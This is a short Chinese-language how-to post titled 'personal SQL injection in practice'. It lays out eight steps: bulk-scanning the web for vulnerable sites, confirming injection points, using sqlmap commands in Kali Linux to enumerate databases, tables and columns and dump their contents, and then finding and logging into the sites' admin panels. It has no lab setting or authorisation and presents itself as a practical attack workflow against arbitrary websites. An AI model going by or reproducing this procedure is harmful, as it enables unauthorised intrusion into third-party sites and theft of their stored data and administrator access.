个人SQL注入实战
第一步:利用傀儡注入点批量扫描工具或者其它方式找出有漏洞的网站
第二步:将傀儡扫到的URL复制到文本文档,使用超级sql注入工具进行注入扫描操作,确认是否存在注入点的URL
第三步:将有注入点的URL放入到KaliLinux中进行**,先解析数据库,命令格式为sqlmap -u URL地址 --dbs
第四部:在kaliLinux中继续**表名,命令格式为:sqlmap -u URL地址 --tables -D 数据库名
第五步:在kaliLinux中继续**表中的字段名称,命令格式为:sqlmap -u URL地址 --columns -T 表名 -D 数据库名
第六步:在kaliLinux中**字段里面的内容,命令格式为:sqlmap -u URL地址 --dump -C 字段名 -T 表名 -D 数据库名
第七部:利用后台扫描工具找到注入网站的后台
第八步:登陆网站后台